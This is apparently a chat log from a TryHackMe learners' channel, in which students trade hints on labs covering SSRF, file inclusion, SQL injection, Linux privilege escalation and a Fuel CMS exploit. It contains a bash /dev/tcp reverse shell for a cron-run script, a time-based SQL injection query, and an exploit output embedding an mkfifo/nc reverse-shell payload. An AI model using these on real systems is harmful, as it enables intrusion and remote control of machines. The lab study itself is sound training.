the question says to read the /etc/passwd file. By just entering the /etc/passwd path in the URL, it will not read it
umm what should i enter?
In the last challenge, gain RCE with RFI am i suppose to make a webserver?
@steel nymph know if this command is correct?
hdym less info?
Well I looked at a writeup and it said you need to use the quinn user and password
uhm hy?
you need to query for the file. think what we use to query and add the path there
reeeeeee
@steel nymph is there anything pre-built in the THM AttackBox where i need to take a look for making a webserver?
hm ok
-v
Anybody having intermittent connection drops to boxes over openvpn?
Add it to the command
bro use scrot or something I can't even read that lmfao
Is the same result
When the event is over, does the room close? or is just the ticketing system disabled?
just tickets
thank you
@steel nymph is this the wrong way? does it have to be php?
how did you manage to get that request? I've been trying for days but i copy this and it worked lol

make sure youre at the same directory as the valid names.txt
Is the same
Anyone have any problems opening up the website for xss task 8? I get https://machine_IP.p.thmlabs.com as the link. I copy and paste into my attackbox browser to open it, and get certificate issues warning. I accept and continue and then get 504. I've run nmap and tried using just http, which gives me the nginx page. I've even tried port 9999, but can't connect. I've terminated and restarted the web machine 3x and terminated by attackbox once.
In bypass authentication task 3
your valid_username.txt file name is custom, it shouldn't matter but anyways -> is the content of the file correct and does it have the specific usernames you found?
thanks mate
Gave +1 Rep to @steel nymph
http://add_the_machine_ip_address
also check that you are at the correct IP. you need the "active machine ip", not the one all the way at the top nav bar
is it in the same dir?
Hey guys, can someone link me to a nice SSRF explanation? Because the room alone is not enough for me
When I run my webserver it gives back the hostname but when I put it into the Lab is says couldn't connect to server?
Thanks bro!
Gave +1 Rep to @steel nymph
ahh
does it matter if it's a file or happens when getting on landingpage?
haha
Remote FILE Inclusion, my bad
The method of the form (say the input) is specified in the Source code. You can simply switch it to post by editing with dev tools. Then you can query with a test or empty value and catch the request with burps proxy
Yeah, I tried that but I guess I was doing it wrong. I don't like to copy paste, feels like cheating haha
If you copy and paste, you should try to understand why the copypasta works. You're playing yourself if not. And real assessments are going to give u a hard time if you don't know the attack surface.
for god sake am stuck at linux priv room i cant get a reverse shell on task 9 cron jobs
bash -i >& /dev/tcp/ip/4444 0>&1
put that in /home/karen/backup.sh
and listening with nc -lvnp 4444
hi ca
n anyone help
sqlinjectionv2 room?
it works
like that
but with root
no
if i execute it myself it works but i need root to run it
crontab says the script works every minute
like that
will try it with attack box
now i understand xd
xdddd
in time based injection i cant seem to find the domain any help?
query admin123' UNION SELECT SLEEP(2),2 FROM ||analytics_referrers|| WHERE ||domain|| like'%
i did find the table name but can't find the query after that
sry i found the column name too
why would u use that table
Hi, for linux privEsc task 6, I have no idea how to continue from this point
karen@ip-10-10-9-123:/$ sudo cat /etc/shadow
[sudo] password for karen:
Sorry, user karen is not allowed to execute '/usr/bin/cat /etc/shadow' as root on ip-10-10-9-123.eu-west-1.compute.internal.
karen@ip-10-10-9-123:/$ cat etc/shadow
cat: etc/shadow: Permission denied
Please help
I left with this question "What is the hash of frank's password?"
I follow the task using LD_PRELOAD=/tmp/shell.so find and cat flag2.txt already. But it still shows access denied when reading etc/shadow
I got the following after sudo -l
Matching Defaults entries for karen on ip-10-10-9-123:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User karen may run the following commands on ip-10-10-9-123:
(ALL) NOPASSWD: /usr/bin/find
(ALL) NOPASSWD: /usr/bin/less
(ALL) NOPASSWD: /usr/bin/nano
Got it. Thank you
How can i put a specific file on my python webserver? i cant figure it out
https://tryhackme.com/room/burpsuiteintruder Task 8: What would the body parameters of the first request that Burp Suite sends be? Stuck on this one and would like some help on battering ram!
yeah I looked at hint and tried several things but still don't understand
Does the answer have "§" symbols?
Ah, it was just formatting - thanks!
Am i doing something wrong @steel nymph? I have in the folder of the webserver.py file another folder which contains 2 files. A php script and a text file for testing but i cant reach both of them.
haha ok it is working now:)
ah
well I didnt expected to be working on this single room for like 4 hours lol
atleast it was worth the 4
4 hours? very good. it took me 2 days
what about ssrf btw
yes was very educating
sure
hi, I am on linux privesc, task 8, third question. Don't understand what do I have to answer here
You guys had any good tickets so far?
I was hoping for the OSCP voucher
but no luck for me
If I retrieve all them, I think that have like 3 weeks of streak, 3 days streaks complete, 2 Pentester titles... And nothing else. Throwback: 2 cards, 1 month and 3 month 2x... Nothing else
Forget the tickets its over
too late
i have kinda the same
till 27th right?
yeah but all the good stuff have been redeemed
ah really
Its limited, thats why we get alot of pentester titles and stuff
cuz those are free
But its ok
good you tell me this i was about 2 grind so hard for the 27th lol
yeah just take your time now
its simply the binary name
well, I will end privilege escalation and invest some days on Buffer overflows
yes, I found it, but don't understand the question related to the others...
It doesn't update at my place tho @noble rose
i got 2 oscp vouchers just on finishing like 50%, after that only pentester titles
yeah it doenst just a picture
ah clickbait
can anyone help with SSRF task 2 ?
I got the 3 tickets for it
What part you stuck on w it
Lucky + congrats
wanna switch accounts?
im not understanding it
congrats tho
mainly cuz i suck at programming

i dont know what the &x= shit is
Read through the site it gives you a few times, and take into account what you learnt from file inclusion
read step 4 of the example slowly and have a look at what is the expected request, what hacker requests and how server requests
^
It gives you everything you need to know
yeh gl mate
Have fun
tricky, but after two or three reads you'll see it
anyone done with the vulnerability capstone?
?
stuck at setting up a netcat reverse listener and gaining RCE
So I setup the listener on my attacking machine(attackbox) on port 5550. Its listening.
Next, I opened another terminal and ran the python3 exploit.py http://machineIP
So its given me a menu where I select the "shell_me"
so when I enter my attacking machine IP there and the port 5550, it fails.
||CVE-2018-16763
https://www.exploit-db.com/exploits/47138
in the attack box, its present in the path:/usr/share/exploits/vulnerabilitiescapstone||
it says in the hint too!
once you run the exploit, it automatically asks you to run reverse shell
sorry, didnt get ya :/
if you use that exploit given, shell_me should be enough
yep, so in shell_me, if I enter the IP of the attacking machine and the port I am making it listen to, its failing
try listen from ur local machine again
do you enter the ip and port like this IP:PORT ?
yes
||root@ip-10-10-26-94:/usr/share/exploits/vulnerabilitiescapstone# python3 exploit.py http://10.10.15.166
Tested on 1.4
Created by Ac1d
Menu
exit - Exit app
shell_me - Get a reverse shell (netcat)
help - Show this help
fuelCMS$ shell_me
Enter your attacking machine IP:PORT $ 10.10.26.94:5550
Hope you had your listener ready!!
An error occured, please try again...
HTTPConnectionPool(host='http', port=80): Max retries exceeded with url: //10.10.15.166/fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a(%27rm%20/tmp/f%3Bmkfifo%20/tmp/f%3Bcat%20/tmp/f%7C/bin/sh%20-i%202%3E%261%7Cnc%2010.10.26.94%205550%20%3E/tmp/f%27)%2B%27 (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7fc64abd3c50>: Failed to establish a new connection: [Errno -3] Temporary failure in name resolution',))||
Can i dm someone for the SSRF task 2 please ?
Would any help me with SSRF Practical please?
too many requests to the server. maybe reset the connection and try again?
should work fine normally
I tried as instructed change the directory to x/../private. but /private doesn't show up on the source code
reset as in start a new listener or refresh the attackbox??
attackbox
and I couldn't decode the base64 code using base64decode.org too
will do. thanks!
Gave +1 Rep to @wild sundial
@cobalt skiff @main dune thanks, you helped me finish the SQLi challenge in Task 8.
Gave +1 Rep to @cobalt skiff
Are there supposed to be creds for the windows priv esc room anyone know?
inspect on current avatar and u should see a base64 string that ends with ==
Thanks! I'm just blind, I can't see that anywhere on the page
Gave +1 Rep to @steel nymph
Thanks a lot!!!
Gave +1 Rep to @wild sundial
Anyone else having issues SSHing into the linux privesc box with the provided creds? Also noticing that I cannot wget files from my local http server to the attack box. Have confirmed I'm on VPN correctly, able to ping the box fine, and have even stopped and re-started the box and my own system. Am I crazy?
what about curl
Curl not installed, karen not a sudoer
u just cant wget?
have u used the output dir flag ?
I didn't have any issues sshing into the box about an hour ago
Move to /tmp to use wget
You don't have write perms for the directory you're in
Hi all, I initially moved into /tmp to try to wget, system just hung. Same with me trying to SSH in. Tried wget from /tmp outbound to pull file off net and also just sits frozen.
So I just did that task and on my local machine and it was working just fine.
maybe it's my config. I'll dig around as both machines can ping each other just fine.
Seems it was tied to my home VPN. Disconnecting and suddenly everything works again. Sorry for false alarm, all.
Hello! Anyone could direct me in the right direction for https://tryhackme.com/room/exploitingavulnerabilityv2 (last task)
So have you answered the first question of that task already ?
yup, online ****
And what about the exploit, have you found the correct one already?
through exploit-db
RCE right.
i placed the &x=api
How did you run it?
like this -> python 47887.py 10.10.148.177
read step 4 of the example slowly and have a look at what is the expected request, what hacker requests and how server requests
You have to use python3
Also not sure if you have to put http:// infront of the IP, but I don't think so
same issue though
Problem with task 11 Linux PrivEsc, can't root: mount -o rw,vers=2 10.10.117.1:/tmp /tmp/test
mount: only root can use "--options" option
yeah i'm not getting it
So you tried it with http://IP and still not working? What's the error you get?
Attempting to upload PHP web shell...
Traceback (most recent call last):
File "47887.py", line 28, in <module>
r = requests.post(url + '/admin_add.php', files=file, data={'add':'1'}, verify=False)
File "/usr/lib/python3/dist-packages/requests/api.py", line 112, in post
return request('post', url, data=data, json=json, **kwargs)
File "/usr/lib/python3/dist-packages/requests/api.py", line 58, in request
return session.request(method=method, url=url, **kwargs)
File "/usr/lib/python3/dist-packages/requests/sessions.py", line 506, in request
prep = self.prepare_request(req)
File "/usr/lib/python3/dist-packages/requests/sessions.py", line 449, in prepare_request
hooks=merge_hooks(request.hooks, self.hooks),
File "/usr/lib/python3/dist-packages/requests/models.py", line 305, in prepare
self.prepare_url(url, params)
File "/usr/lib/python3/dist-packages/requests/models.py", line 379, in prepare_url
raise MissingSchema(error)
requests.exceptions.MissingSchema: Invalid URL '10.10.148.177/admin_add.php': No schema supplied. Perhaps you meant http://10.10.148.177/admin_add.php?
sorry i can't send images over here for some reason